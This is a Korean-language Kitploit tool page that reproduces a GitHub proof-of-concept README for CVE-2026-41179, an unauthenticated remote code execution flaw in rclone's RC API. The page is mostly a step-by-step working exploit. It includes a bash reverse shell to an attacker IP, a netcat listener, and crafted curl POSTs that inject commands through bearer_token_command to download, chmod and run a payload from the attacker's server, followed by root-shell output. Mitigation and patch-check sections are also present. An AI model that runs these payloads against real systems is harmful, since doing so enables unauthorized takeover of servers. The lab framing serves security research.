Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41179 — CVE-2026-41179에 대한 POC | Kitploit
도구/GitHubGitHub/pssec-io/cve-2026-41179
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationPayload DevelopmentLabs & Practice
GitHubpssec-io/cve-2026-41179

CVE-2026-41179

CVE-2026-41179에 대한 POC

저장소 보기
22개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-41179 — rclone RC API 인증 없는 RCE

⚠️ 교육 목적으로만 제공 이 저장소는 보안 연구, 교육 및 인가된 실습 환경에서만 사용하도록 엄격히 제한됩니다. PSSec 및 이 저장소의 기여자들은 본 저장소에 포함된 정보, 코드 또는 기술의 무단, 불법 또는 악의적 사용을 묵인하거나 지지하지 않으며 이에 대한 어떠한 책임도 지지 않습니다. 이 저장소를 사용함으로써 귀하는 자신의 행동에 전적으로 책임이 있으며, 소유한 시스템 또는 명시적 서면 허가를 받은 시스템에 대해서만 테스트를 수행할 것에 동의합니다.


개요

CVE-2026-41179는 rclone에 내장된 원격 제어(RC) API에서 발견된 치명적인 인증 없는 원격 코드 실행(RCE) 취약점으로, 1.48.0부터 1.73.4까지의 버전에 영향을 미칩니다.

도구 다운로드
세부 정보값
CVECVE-2026-41179
CVSS 점수9.8 (치명적)
영향을 받는 버전rclone 1.48.0 – 1.73.4
패치된 버전rclone 1.73.5
구성 요소RC API (/operations/fsinfo 엔드포인트)
공격 벡터네트워크 — 인증 불필요

작동 원리

rclone에는 기본 제공되는 HTTP 원격 제어 인터페이스(rcd)가 포함되어 있습니다. /operations/fsinfo 엔드포인트는 사용자가 제공한 fs= 문자열을 받아 구문 분석한 후 백엔드를 인스턴스화하는 데 사용합니다 — WebDAV 백엔드를 포함합니다. WebDAV 백엔드는 bearer_token_command 매개변수를 지원하며, 이 매개변수는 검증 없이 exec.Command()에 직접 전달됩니다. 이 엔드포인트는 기본적으로 인증이 필요 없기 때문에, 인증되지 않은 공격자가 rclone 프로세스 사용자 권한으로 임의의 OS 명령 실행을 트리거할 수 있습니다.

간단한 공격 체인:

root@kitploit:~
POST /operations/fsinfo (no auth)
  → rc.GetFs() parses attacker-controlled fs= string
    → WebDAV backend instantiated with attacker params
      → bearer_token_command extracted
        → exec.Command() fires OS command
          → RCE as rclone process user

저장소 구조

root@kitploit:~
CVE-2026-41179/
├── Dockerfile.rclone          # Vulnerable rclone image (v1.69.3)
├── patched.Dockerfile.rclone  # Patched rclone image (v1.73.5)
├── poc.sh                     # Reverse shell payload
└── instructions               # Step-by-step lab walkthrough

실습 환경 구축 및 공격 (단계별)

사전 요구 사항

  • Docker
  • 리스너: penelope 또는 netcat
  • Python 3 (페이로드 제공용)

1단계 — 취약한 Docker 이미지 빌드

root@kitploit:~
docker build -t rclone-vuln -f Dockerfile.rclone .

rclone v1.69.3을 실행하고 RC API를 포트 5572에 노출하는 Debian-slim 컨테이너를 빌드합니다.


2단계 — 취약한 컨테이너 실행

root@kitploit:~
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln

이제 RC API는 http://127.0.0.1:5572에서 인증 없이 접근할 수 있습니다.


3단계 — 리스너 시작

root@kitploit:~
penelope -p 5555
# OR
nc -lvnp 5555

4단계 — 리버스 셸 페이로드 구성

poc.sh를 편집하여 공격자 IP와 리스닝 포트를 설정하세요:

root@kitploit:~
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/<listening-port> 0>&1

5단계 — HTTP로 페이로드 제공

poc.sh와 같은 디렉터리에서 다음을 실행하세요:

root@kitploit:~
python3 -m http.server 8888

6단계 — 대상에 페이로드 다운로드

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://<attacker-ip>:8888/poc.sh':'

7단계 — 페이로드를 실행 가능하게 만들기

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':'

8단계 — 페이로드 실행

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':'

9단계 — 셸 획득

리스너를 확인하세요 — 컨테이너에서 루트 셸을 수신했을 것입니다:

root@kitploit:~
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root

10단계 — 패치 확인

패치된 이미지를 사용하여 1~8단계를 반복하고 취약점이 수정되었는지 확인하세요:

root@kitploit:~
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched

포트 5573에 동일한 curl 요청을 보내보세요 — 명령이 실행되지 않아야 합니다.


해결 방법

  • rclone을 v1.73.5 이상으로 업그레이드하세요 — 이제 기본적으로 모든 RC 엔드포인트에서 인증이 강제됩니다.
  • 즉시 업그레이드할 수 없다면, 자격 증명을 요구하도록 --rc-user 및 --rc-pass 플래그와 함께 rcd를 시작하세요.
  • 방화벽 규칙을 통해 RC 포트(5572)에 대한 네트워크 접근을 제한하세요 — 신뢰할 수 없는 네트워크에 노출되어서는 안 됩니다.
  • 시작 스크립트에서 --rc-no-auth=false(패치된 버전의 새로운 기본값)를 명시적으로 사용하는 것을 고려하세요.

면책 조항

이 저장소는 교육 및 인가된 보안 연구 목적으로만 제공됩니다. 개념 증명(PoC) 코드는 통제된 Docker 실습 환경에서 실제 취약점을 시연합니다.

PSSec 및 모든 기여자:

  • 시스템 소유자의 명시적 서면 허가 없이 시스템을 공격(exploit)하는 것을 승인하거나 장려하지 않습니다.
  • 이 자료를 사용하여 발생하는 손해, 데이터 손실, 법적 결과 또는 오용에 대해 어떠한 책임도 지지 않습니다.
  • 모든 테스트는 귀하가 소유하거나 명시적으로 테스트 승인을 받은 격리된 실습 환경에서만 수행할 것을 권장합니다.

이 코드를 운영(프로덕션) 시스템이나 소유하지 않은 시스템에 무단으로 사용하면 해당 관할권의 컴퓨터 사기 및 사이버 범죄 관련 법률을 위반할 수 있습니다.


CVE-2026-41179 — PSSec 연구